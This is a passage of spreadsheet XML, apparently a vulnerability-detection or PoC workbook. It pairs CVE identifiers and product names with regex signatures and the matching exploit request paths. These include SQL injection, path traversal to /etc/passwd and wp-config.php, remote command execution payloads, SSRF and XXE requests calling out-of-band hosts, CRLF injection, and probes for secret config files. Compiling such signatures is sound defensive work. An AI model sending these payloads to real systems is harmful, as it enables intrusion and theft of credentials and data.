    <t xml:space="preserve">.*?(?:/wp-admin/admin-ajax\.php\?action=crypto_connect_ajax_process&amp;method_name=register&amp;param1=admin </t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=crypto_connect_ajax_process&amp;method_name=register&amp;param1=admin|/</t>
  </si>
  <si>
    <t>Fortra GoAnywhere MFT</t>
  </si>
  <si>
    <t>CVE-2024-0204</t>
  </si>
  <si>
    <t>.*?(?:/goanywhere/images/\.\.;/wizard/InitialAccountSetup\.xhtml).*</t>
  </si>
  <si>
    <t>/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml</t>
  </si>
  <si>
    <t>OpenMetadata</t>
  </si>
  <si>
    <t>CVE-2024-28255</t>
  </si>
  <si>
    <t>.*?(?:/api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T\(java\.lang\.Runtime\)\.getRuntime\(\)\.exec\(new%20java\.lang\.String\(T\(java\.util\.Base64\)\.getDecoder\(\)\.decode\(%22.*?%22\)\)\)).*</t>
  </si>
  <si>
    <t>/api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{{payload}}%22)))</t>
  </si>
  <si>
    <t>Navidrome</t>
  </si>
  <si>
    <t>CVE-2025-27112</t>
  </si>
  <si>
    <t>.*?(?:/rest/getPlaylists\?u=FakeUser&amp;t=.*?&amp;s=.*?&amp;v=1\.16\.1&amp;c=castafiore&amp;f=json).*</t>
  </si>
  <si>
    <t>/rest/getPlaylists?u=FakeUser&amp;t={{md5(username)}}&amp;s={{username}}&amp;v=1.16.1&amp;c=castafiore&amp;f=json</t>
  </si>
  <si>
    <t>CVE-2025-32815</t>
  </si>
  <si>
    <t>.*?(?:/netmri/common/SetRawCookie\.tdf\?name=letmein&amp;value=%78%79%7a%0d%0a%55%73%65%72%4e%61%6d%65%3d%61%64%6d%69%6e|/visual/ViewerFileServlet\?fileName=/etc/shadow).*</t>
  </si>
  <si>
    <t>/visual/ViewerFileServlet?fileName=/etc/shadow|/netmri/common/SetRawCookie.tdf?name=letmein&amp;value=%78%79%7a%0d%0a%55%73%65%72%4e%61%6d%65%3d%61%64%6d%69%6e</t>
  </si>
  <si>
    <t>.*?(?:/api/virtual/home/status\?cat=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./usr/local/nsfocus/web/apache2/www/local_user\.php&amp;method=login&amp;user_account=admin).*</t>
  </si>
  <si>
    <t>/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&amp;method=login&amp;user_account=admin|/</t>
  </si>
  <si>
    <t>文件泄露</t>
  </si>
  <si>
    <t>CVE-2015-1579</t>
  </si>
  <si>
    <t>.*?(?:/blog/wp-admin/admin-ajax\.php\?action=revslider_show_image&amp;img=\.\./wp-config\.php|/wp-admin/admin-ajax\.php\?action=revslider_show_image&amp;img=\.\./wp-config\.php).*</t>
  </si>
  <si>
    <t>/blog/wp-admin/admin-ajax.php?action=revslider_show_image&amp;img=../wp-config.php|/wp-admin/admin-ajax.php?action=revslider_show_image&amp;img=../wp-config.php</t>
  </si>
  <si>
    <t>CVE-2017-7925</t>
  </si>
  <si>
    <t>.*?(?:/current_config/passwd).*</t>
  </si>
  <si>
    <t>/current_config/passwd</t>
  </si>
  <si>
    <t>Icinga Web</t>
  </si>
  <si>
    <t>CVE-2022-24716</t>
  </si>
  <si>
    <t>.*?(?:/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd|/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd|/lib/icinga/icinga-php-thirdparty/etc/passwd).*</t>
  </si>
  <si>
    <t>/lib/icinga/icinga-php-thirdparty/etc/passwd|/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd|/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd</t>
  </si>
  <si>
    <t>Adobe Connect</t>
  </si>
  <si>
    <t>CVE-2023-22232</t>
  </si>
  <si>
    <t>.*?(?:/system/download\?download-url=/_a7/p49dm7f4qjyt/output/&amp;name=exam\.pdf).*</t>
  </si>
  <si>
    <t>/system/download?download-url=/_a7/p49dm7f4qjyt/output/&amp;name=exam.pdf</t>
  </si>
  <si>
    <t>FastCGI Configuration</t>
  </si>
  <si>
    <t>.*?(?:/config/fastcgi\.conf|/fastcgi\.conf).*</t>
  </si>
  <si>
    <t>/fastcgi.conf|/config/fastcgi.conf</t>
  </si>
  <si>
    <t>Mercurial Ignore</t>
  </si>
  <si>
    <t>.*?(?:/\.hgignore).*</t>
  </si>
  <si>
    <t>/.hgignore</t>
  </si>
  <si>
    <t>cPanel Configuration</t>
  </si>
  <si>
    <t>.*?(?:/cpanel\.config).*</t>
  </si>
  <si>
    <t>/cpanel.config</t>
  </si>
  <si>
    <t>Apdisk</t>
  </si>
  <si>
    <t>.*?(?:/\.apdisk).*</t>
  </si>
  <si>
    <t>/.apdisk</t>
  </si>
  <si>
    <t>Azure Pipelines</t>
  </si>
  <si>
    <t>.*?(?:/\.azure-pipelines\.yml|/azure-pipelines\.yml).*</t>
  </si>
  <si>
    <t>/.azure-pipelines.yml|/azure-pipelines.yml</t>
  </si>
  <si>
    <t>Cargo TOML</t>
  </si>
  <si>
    <t>.*?(?:/Cargo\.toml).*</t>
  </si>
  <si>
    <t>/Cargo.toml</t>
  </si>
  <si>
    <t>Dnsmasq Config</t>
  </si>
  <si>
    <t>.*?(?:/dnsmasq\.conf).*</t>
  </si>
  <si>
    <t>/dnsmasq.conf</t>
  </si>
  <si>
    <t>Docker Cloud Yaml</t>
  </si>
  <si>
    <t>.*?(?:/docker-cloud\.yml).*</t>
  </si>
  <si>
    <t>/docker-cloud.yml</t>
  </si>
  <si>
    <t>Elastic Kibana Config</t>
  </si>
  <si>
    <t>.*?(?:/kibana\.yml).*</t>
  </si>
  <si>
    <t>/kibana.yml</t>
  </si>
  <si>
    <t xml:space="preserve">Git Mailmap </t>
  </si>
  <si>
    <t>.*?(?:/\.mailmap).*</t>
  </si>
  <si>
    <t>/.mailmap</t>
  </si>
  <si>
    <t>Haproxy Config</t>
  </si>
  <si>
    <t>.*?(?:/haproxy\.cfg).*</t>
  </si>
  <si>
    <t>/haproxy.cfg</t>
  </si>
  <si>
    <t>Icecast Config</t>
  </si>
  <si>
    <t>.*?(?:/icecast\.xml).*</t>
  </si>
  <si>
    <t>/icecast.xml</t>
  </si>
  <si>
    <t>Lighttpd Config</t>
  </si>
  <si>
    <t>.*?(?:/lighttpd\.conf).*</t>
  </si>
  <si>
    <t>/lighttpd.conf</t>
  </si>
  <si>
    <t>.*?(?:/\.php_cs\.cache).*</t>
  </si>
  <si>
    <t>/.php_cs.cache</t>
  </si>
  <si>
    <t>Redmine settings</t>
  </si>
  <si>
    <t>.*?(?:/redmine/config/settings\.yml|/config/settings\.yml|/settings\.yml).*</t>
  </si>
  <si>
    <t>/settings.yml|/config/settings.yml|/redmine/config/settings.yml</t>
  </si>
  <si>
    <t>Secret Token Ruby</t>
  </si>
  <si>
    <t>.*?(?:/redmine/config/initializers/secret_token\.rb|/config/initializers/secret_token\.rb|/secret_token\.rb).*</t>
  </si>
  <si>
    <t>/redmine/config/initializers/secret_token.rb|/secret_token.rb|/config/initializers/secret_token.rb</t>
  </si>
  <si>
    <t>Socks VPN</t>
  </si>
  <si>
    <t>.*?(?:/backup/config\.xml).*</t>
  </si>
  <si>
    <t>/backup/config.xml</t>
  </si>
  <si>
    <t>Symfony security</t>
  </si>
  <si>
    <t>.*?(?:/app/config/security\.yml|/config/security\.yml|/security\.yml).*</t>
  </si>
  <si>
    <t>/app/config/security.yml|/config/security.yml|/security.yml</t>
  </si>
  <si>
    <t>WS FTP</t>
  </si>
  <si>
    <t>.*?(?:/ws_ftp\.ini).*</t>
  </si>
  <si>
    <t>/ws_ftp.ini</t>
  </si>
  <si>
    <t>Production Log</t>
  </si>
  <si>
    <t>.*?(?:/logs/production\.log|/log/production\.log|/production\.log).*</t>
  </si>
  <si>
    <t>/logs/production.log|/log/production.log|/production.log</t>
  </si>
  <si>
    <t>.*?(?:/htaccess\.txt).*</t>
  </si>
  <si>
    <t>/htaccess.txt</t>
  </si>
  <si>
    <t>Mysql History</t>
  </si>
  <si>
    <t>.*?(?:/\.mysql_history).*</t>
  </si>
  <si>
    <t>/.mysql_history</t>
  </si>
  <si>
    <t>启航Digital Signage</t>
  </si>
  <si>
    <t>.*?(?:/QH\.aspx\?responderId=ResourceNewResponder&amp;action=download&amp;fileName=\.%2fQH\.aspx).*</t>
  </si>
  <si>
    <t>/QH.aspx?responderId=ResourceNewResponder&amp;action=download&amp;fileName=.%2fQH.aspx</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/DownloadServlet\?modeType=0&amp;key=x&amp;path=\.\.&amp;FileName=WEB-INF/classes/fc\.properties&amp;name=x&amp;encrypt=x&amp;cd=&amp;downloadAll=2).*</t>
  </si>
  <si>
    <t>/defaultroot/DownloadServlet?modeType=0&amp;key=x&amp;path=..&amp;FileName=WEB-INF/classes/fc.properties&amp;name=x&amp;encrypt=x&amp;cd=&amp;downloadAll=2</t>
  </si>
  <si>
    <t>CVE-2024-7340</t>
  </si>
  <si>
    <t>.*?(?:/__weave/file/tmp/weave/fs/\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/__weave/file/tmp/weave/fs/../../../etc/passwd</t>
  </si>
  <si>
    <t>CRLF注入</t>
  </si>
  <si>
    <t>CVE-2016-4975</t>
  </si>
  <si>
    <t>.*?(?:/~user/%0D%0ASet-Cookie:crlfinjection).*</t>
  </si>
  <si>
    <t>/~user/%0D%0ASet-Cookie:crlfinjection</t>
  </si>
  <si>
    <t>OpenVPN Access Server</t>
  </si>
  <si>
    <t>CVE-2017-5868</t>
  </si>
  <si>
    <t>.*?(?:/__session_start__/%0aSet-Cookie:%20crlfinjection=1;).*</t>
  </si>
  <si>
    <t>/__session_start__/%0aSet-Cookie:%20crlfinjection=1;</t>
  </si>
  <si>
    <t>Sercomm VD Smart Modems</t>
  </si>
  <si>
    <t>CVE-2021-27132</t>
  </si>
  <si>
    <t>.*?(?:/test\.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact\.sh%0d%0aX-XSS-Protection:0).*</t>
  </si>
  <si>
    <t>/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0</t>
  </si>
  <si>
    <t>Microweber</t>
  </si>
  <si>
    <t>CVE-2022-0666</t>
  </si>
  <si>
    <t>.*?(?:/api/logout\?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;).*</t>
  </si>
  <si>
    <t>/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;</t>
  </si>
  <si>
    <t>Kerio Control</t>
  </si>
  <si>
    <t>CVE-2024-52875</t>
  </si>
  <si>
    <t>.*?(?:/nonauth/guestConfirm\.cs\?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d|/nonauth/addCertException\.cs\?dest=VGVzdA0KQ1JMRjo%3d|/nonauth/guestConfirm\.cs\?dest=VGVzdA0KQ1JMRjo%3d|/nonauth/expiration\.cs\?dest=VGVzdA0KQ1JMRjo%3d).*</t>
  </si>
  <si>
    <t>/nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d|/nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d|/nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d|/nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d</t>
  </si>
  <si>
    <t>.*?(?:/rails/actions\?error=ActiveRecord::PendingMigrationError&amp;action=Run%20pending%20migrations&amp;location=%0djavascript:alert\(1\)//%0aaaaaa).*</t>
  </si>
  <si>
    <t>/rails/actions?error=ActiveRecord::PendingMigrationError&amp;action=Run%20pending%20migrations&amp;location=%0djavascript:alert(1)//%0aaaaaa</t>
  </si>
  <si>
    <t>Oracle Business Intelligence Publisher</t>
  </si>
  <si>
    <t>XML外部实体注入</t>
  </si>
  <si>
    <t>CVE-2019-2767</t>
  </si>
  <si>
    <t>.*?(?:/xmlpserver/convert\?xml=&lt;%3fxml\+version%3d"1\.0"\+%3f&gt;&lt;!DOCTYPE\+r\+\[&lt;!ELEMENT\+r\+ANY\+&gt;&lt;!ENTITY\+%25\+sp\+SYSTEM\+"http%3a//.*?/xxe\.xml"&gt;%25sp%3b%25param1%3b\]&gt;&amp;_xf=Excel&amp;_xl=123&amp;template=123).*</t>
  </si>
  <si>
    <t>/xmlpserver/convert?xml=&lt;%3fxml+version%3d"1.0"+%3f&gt;&lt;!DOCTYPE+r+[&lt;!ELEMENT+r+ANY+&gt;&lt;!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml"&gt;%25sp%3b%25param1%3b]&gt;&amp;_xf=Excel&amp;_xl=123&amp;template=123</t>
  </si>
  <si>
    <t>CVE-2017-12629</t>
  </si>
  <si>
    <t>.*?(?:/solr/.*?/select\?q=%3C%3Fxml%20version%3D%221\.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F.*?%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&amp;wt=xml&amp;defType=xmlparser).*</t>
  </si>
  <si>
    <t>/solr/admin/cores?wt=json|/solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&amp;wt=xml&amp;defType=xmlparser</t>
  </si>
  <si>
    <t>代码注入</t>
  </si>
  <si>
    <t>CVE-2020-8194</t>
  </si>
  <si>
    <t>.*?(?:/menu/guiw\?nsbrand=1&amp;protocol=nonexistent\.1337"&gt;&amp;id=3&amp;nsvpx=phpinfo).*</t>
  </si>
  <si>
    <t>/menu/guiw?nsbrand=1&amp;protocol=nonexistent.1337"&gt;&amp;id=3&amp;nsvpx=phpinfo</t>
  </si>
  <si>
    <t>CVE-2020-13167</t>
  </si>
  <si>
    <t>.*?(?:/webadmin/tools/unixlogin\.php\?login=admin&amp;password=g%27%2C%27%27%29%3Bimport%20os%3Bos\.system%28%27.*?%27\.decode%28%27hex%27%29%29%23&amp;timeout=5).*</t>
  </si>
  <si>
    <t>/webadmin/tools/unixlogin.php?login=admin&amp;password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&amp;timeout=5|/webadmin/out</t>
  </si>
  <si>
    <t>服务端请求伪造</t>
  </si>
  <si>
    <t>CVE-2020-10770</t>
  </si>
  <si>
    <t>.*?(?:/auth/realms/master/protocol/openid-connect/auth\?scope=openid&amp;response_type=code&amp;redirect_uri=valid&amp;state=cfx&amp;nonce=cfx&amp;client_id=security-admin-console&amp;request_uri=http://.*?/).*</t>
  </si>
  <si>
    <t>/auth/realms/master/protocol/openid-connect/auth?scope=openid&amp;response_type=code&amp;redirect_uri=valid&amp;state=cfx&amp;nonce=cfx&amp;client_id=security-admin-console&amp;request_uri=http://{{interactsh-url}}/</t>
  </si>
  <si>
    <t>CVE-2021-29490</t>
  </si>
  <si>
    <t>.*?(?:/Items/RemoteSearch/Image\?ImageUrl=https://oast\.me/&amp;ProviderName=TheMovieDB|/Images/Remote\?imageUrl=https://oast\.me/).*</t>
  </si>
  <si>
    <t>/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&amp;ProviderName=TheMovieDB|/Images/Remote?imageUrl=https://oast.me/</t>
  </si>
  <si>
    <t>MeterSphere</t>
  </si>
  <si>
    <t>CVE-2022-23544</t>
  </si>
  <si>
    <t>.*?(?:/resource/md/get/url\?url=http://oast\.pro).*</t>
  </si>
  <si>
    <t>/resource/md/get/url?url=http://oast.pro</t>
  </si>
  <si>
    <t>ChatGPT个人专用版</t>
  </si>
  <si>
    <t>CVE-2024-27564</t>
  </si>
  <si>
    <t>.*?(?:/pictureproxy\.php\?url=http://.*?|/pictureproxy\.php\?url=file:///etc/passwd).*</t>
  </si>
  <si>
    <t>/pictureproxy.php?url=file:///etc/passwd|/pictureproxy.php?url=http://{{interactsh-url}}</t>
  </si>
  <si>
    <t>MindsDB</t>
  </si>
  <si>
    <t>CVE-2024-24759</t>
  </si>
  <si>
    <t xml:space="preserve">.*?(?:/check_private_url\?url=https://.*?/ </t>
  </si>
  <si>
    <t>/check_private_url?url=https://{{interactsh-url}}/|/</t>
  </si>
  <si>
    <t>CVE-2024-34351</t>
  </si>
  <si>
    <t>.*?(?:/_next/image\?w=16&amp;q=10&amp;url=https://.*?|/_next/image\?w=16&amp;q=10&amp;url=http://.*?).*</t>
  </si>
  <si>
    <t>/_next/image?w=16&amp;q=10&amp;url=http://{{interactsh-url}}|/_next/image?w=16&amp;q=10&amp;url=https://{{interactsh-url}}</t>
  </si>
  <si>
    <t>CVE-2024-27954</t>
  </si>
  <si>
    <t>.*?(?:/\?p=3232&amp;wp_automatic=download&amp;link=file:///etc/passwd).*</t>
  </si>
  <si>
    <t>/?p=3232&amp;wp_automatic=download&amp;link=file:///etc/passwd</t>
  </si>
  <si>
    <t>TiTiler</t>
  </si>
  <si>
    <t>.*?(?:/cog/info\?url=http://.*?).*</t>
  </si>
  <si>
    <t>/cog/info?url=http://{{interactsh-url}}</t>
  </si>
  <si>
    <t>Umbraco</t>
  </si>
  <si>
    <t>.*?(?:/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent\?section=TryToAvoidGetCacheItem111&amp;baseUrl=http://.*?/|/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss\?section=AvoidGetCacheItem&amp;baseUrl=http://.*?/|/umbraco/BackOffice/Api/Help/GetContextHelpForPage\?section=content&amp;tree=undefined&amp;baseUrl=http://.*?).*</t>
  </si>
  <si>
    <t>/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&amp;baseUrl=http://{{interactsh-url}}/|/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&amp;tree=undefined&amp;baseUrl=http://{{interactsh-url}}|/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&amp;baseUrl=http://{{interactsh-url}}/</t>
  </si>
  <si>
    <t>UEditor</t>
  </si>
  <si>
    <t>.*?(?:/ueditor/php/controller\.php\?action=catchimage&amp;source\[\]=http://127\.0\.0\.1:.*?/\?1\.png|/ueditor/jsp/controller\.jsp\?action=catchimage&amp;source\[\]=http://127\.0\.0\.1:.*?/\?1\.png).*</t>
  </si>
  <si>
    <t>/ueditor/php/controller.php?action=catchimage&amp;source[]=http://127.0.0.1:{{rand_text_numeric(6)}}/?1.png|/ueditor/jsp/controller.jsp?action=catchimage&amp;source[]=http://127.0.0.1:{{rand_text_numeric(6)}}/?1.png</t>
  </si>
  <si>
    <t>CVE-2022-45835</t>
  </si>
  <si>
    <t>.*?(?:/\?phonepe_action=curltestPhonePe&amp;url=http://.*?).*</t>
  </si>
  <si>
    <t>/?phonepe_action=curltestPhonePe&amp;url=http://{{interactsh-url}}</t>
  </si>
  <si>
    <t>Hurrakify</t>
  </si>
  <si>
    <t>CVE-2024-54330</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=hurraki_tooltip_proxy&amp;target=http://.*?).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&amp;target=http://{{interactsh-url}}|/</t>
  </si>
  <si>
    <t>Qualitor</t>
  </si>
  <si>
    <t>CVE-2024-48360</t>
  </si>
  <si>
    <t>.*?(?:/html/ad/adformmobile/request/viewValidacao\.php\?url=oast\.me).*</t>
  </si>
  <si>
    <t>/|/html/ad/adformmobile/request/viewValidacao.php?url=oast.me</t>
  </si>
  <si>
    <t>Zimbra Collaboration Suite</t>
  </si>
  <si>
    <t>.*?(?:/service/error/sfdc_preauth\.jsp\?session=s&amp;userid=1&amp;server=http://.*?%23\.salesforce\.com/).*</t>
  </si>
  <si>
    <t>/service/error/sfdc_preauth.jsp?session=s&amp;userid=1&amp;server=http://{{interactsh-url}}%23.salesforce.com/</t>
  </si>
  <si>
    <t>Twig PHP服务端</t>
  </si>
  <si>
    <t>模板注入</t>
  </si>
  <si>
    <t>.*?(?:/search\?search_key=%7B%7B1337\*1338%7D%7D).*</t>
  </si>
  <si>
    <t>/search?search_key=%7B%7B1337*1338%7D%7D</t>
  </si>
  <si>
    <t>ServiceNow UI Macros</t>
  </si>
  <si>
    <t>CVE-2024-4879</t>
  </si>
  <si>
    <t>.*?(?:/login\.do\?jvar_page_title=&lt;style&gt;&lt;j:jelly%20xmlns:j="jelly"%20xmlns:g=%27glide%27&gt;&lt;g:evaluate&gt;gs\.addErrorMessage\(1337\*1337\);&lt;/g:evaluate&gt;&lt;/j:jelly&gt;&lt;/style&gt;).*</t>
  </si>
  <si>
    <t>/login.do?jvar_page_title=&lt;style&gt;&lt;j:jelly%20xmlns:j="jelly"%20xmlns:g=%27glide%27&gt;&lt;g:evaluate&gt;gs.addErrorMessage(1337*1337);&lt;/g:evaluate&gt;&lt;/j:jelly&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>来源文件</t>
  </si>
  <si>
    <t>Joomla_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_blog_calendar\&amp;modid=\-1%20OR%201%20GROUP%20BY%20CONCAT\(0x7e7e7e,md5\(123\),0x7e7e7e,FLOOR\(RAND\(0\)\*2\)\)%20HAVING%20MIN\(0\)\#).*</t>
  </si>
  <si>
    <t>/index.php?option=com_blog_calendar&amp;modid=-1%20OR%201%20GROUP%20BY%20CONCAT(0x7e7e7e,md5(123),0x7e7e7e,FLOOR(RAND(0)*2))%20HAVING%20MIN(0)#</t>
  </si>
  <si>
    <t>joomla_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_rbids\&amp;task=categories\&amp;filter_letter=%27%20AND%20EXTRACTVALUE%2822%2CCONCAT%280x5c%2Cmd5%281%29%29%29\-\-%20X%0A).*</t>
  </si>
  <si>
    <t>/index.php?option=com_rbids&amp;task=categories&amp;filter_letter=%27%20AND%20EXTRACTVALUE%2822%2CCONCAT%280x5c%2Cmd5%281%29%29%29--%20X%0A</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_rpl\&amp;view=propertyshow\&amp;pid=3%27%20AND%20%28SELECT%204394%0AFROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%280x7e7e7e%2C%28SELECT%0A%28md5%28123%29%29%29%2C0x7e7e7e%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%0AINFORMATION_SCHEMA\.PLUGINS%20GROUP%20BY%20x%29a%29\-\-%20\&amp;Itemid).*</t>
  </si>
  <si>
    <t>/index.php?option=com_rpl&amp;view=propertyshow&amp;pid=3%27%20AND%20%28SELECT%204394%0AFROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%280x7e7e7e%2C%28SELECT%0A%28md5%28123%29%29%29%2C0x7e7e7e%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%0AINFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29--%20&amp;Itemid</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_rand\&amp;catID=1%27%20and\(select%201%20FROM\(select\ count\(\*\),concat\(\(select\(select\ concat\(MD5\(3\.14\),0x27,0x7e\)\)\ FROM\ information_schema\.tables\ LIMIT\ 0,1\),floor\(rand\(0\)\*2\)\)x\ FROM\ information_schema\.tables\ GROUP\ BY\ x\)a\)\-\-%20\-\&amp;limit=1\&amp;style=1\&amp;view=articles\&amp;format=raw\&amp;Itemid=13).*</t>
  </si>
  <si>
    <t>/index.php?option=com_rand&amp;catID=1%27%20and(select%201%20FROM(select count(*),concat((select(select concat(MD5(3.14),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)--%20-&amp;limit=1&amp;style=1&amp;view=articles&amp;format=raw&amp;Itemid=13</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_ebcontent\&amp;view=article\&amp;id=37%27%20AND%20\(SELECT%20\*%20FROM%20\(SELECT\(SLEEP\(5\)\)\)mbyz\)%20AND%20%27dIwT%27=%27dIwT\&amp;cid=29\&amp;Itemid=129\&amp;lang=vn).*</t>
  </si>
  <si>
    <t>/index.php?option=com_ebcontent&amp;view=article&amp;id=37%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))mbyz)%20AND%20%27dIwT%27=%27dIwT&amp;cid=29&amp;Itemid=129&amp;lang=vn</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_gallery_wd\&amp;view=gallerybox\&amp;image_id=19\&amp;gallery_id=2|/index\.php\?option=com_gallery_wd\&amp;view=gallerybox\&amp;image_id=19\&amp;gallery_id=2\&amp;theme_id=1%20AND%20\(SELECT%206173%20FROM\(SELECT%20COUNT\(\*\),CONCAT\(0x716b627871,\(MID\(\(IFNULL\(CAST\(md5\(1\)%20AS%20CHAR\),0x20\)\),1,50\)\),0x716a6a7171,FLOOR\(RAND\(0\)\*2\)\)x%20FROM%20INFORMATION_SCHEMA\.CHARACTER_SETS%20GROUP%20BY%20x\)a\)).*</t>
  </si>
  <si>
    <t>/index.php?option=com_gallery_wd&amp;view=gallerybox&amp;image_id=19&amp;gallery_id=2|/index.php?option=com_gallery_wd&amp;view=gallerybox&amp;image_id=19&amp;gallery_id=2&amp;theme_id=1%20AND%20(SELECT%206173%20FROM(SELECT%20COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(md5(1)%20AS%20CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)</t>
  </si>
  <si>
    <t>sql_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_spidercatalog\&amp;product_id=\-1%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28\*%29%2cconcat%28CONCAT%280x3D,MD5\(3\.14\),0x3D,0x3D,0x3D%29%2cfloor%28rand%28%29\*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27\&amp;view=showproduct\&amp;page_num=1\&amp;back=1).*</t>
  </si>
  <si>
    <t>/index.php?option=com_spidercatalog&amp;product_id=-1%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCAT%280x3D,MD5(3.14),0x3D,0x3D,0x3D%29%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27&amp;view=showproduct&amp;page_num=1&amp;back=1</t>
  </si>
  <si>
    <t>other_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_informations\&amp;view=sousthemes\&amp;themeid=999\.9\+union\+select\+111,222,md5\(1\)%23).*</t>
  </si>
  <si>
    <t>/index.php?option=com_informations&amp;view=sousthemes&amp;themeid=999.9+union+select+111,222,md5(1)%23</t>
  </si>
  <si>
    <t>/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml(0x3a,concat(1,(select md5(1))),1)</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_departments\&amp;id=\-1%20UNION%20SELECT%201,md5\(\{\{num\}\}\),3,4,5,6,7,8\-\-).*</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jobprofile\&amp;Itemid=61\&amp;task=profilesview\&amp;id=\-1\+union\+all\+select\+1,concat_ws\(0x3a,0x3a,md5\(3\.1415\),0x3a\),3,4,5,6,7,8,9).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jobprofile&amp;Itemid=61&amp;task=profilesview&amp;id=-1+union+all+select+1,concat_ws(0x3a,0x3a,md5(3.1415),0x3a),3,4,5,6,7,8,9</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_job\&amp;controller=listcategory\&amp;task=viewJob\&amp;id_job=\-1\+UNION\+ALL\+SELECT\+1,md5\(3\.1415\),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42\-\-).*</t>
  </si>
  <si>
    <t>/index.php?option=com_job&amp;controller=listcategory&amp;task=viewJob&amp;id_job=-1+UNION+ALL+SELECT+1,md5(3.1415),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42--</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_memorix\&amp;task=result\&amp;searchplugin=theme\&amp;Itemid=60\&amp;ThemeID=\-8594\+union\+select\+111,222,MD5\(1\),444,555,666,777,888,999\-\-\+AbuHassan).*</t>
  </si>
  <si>
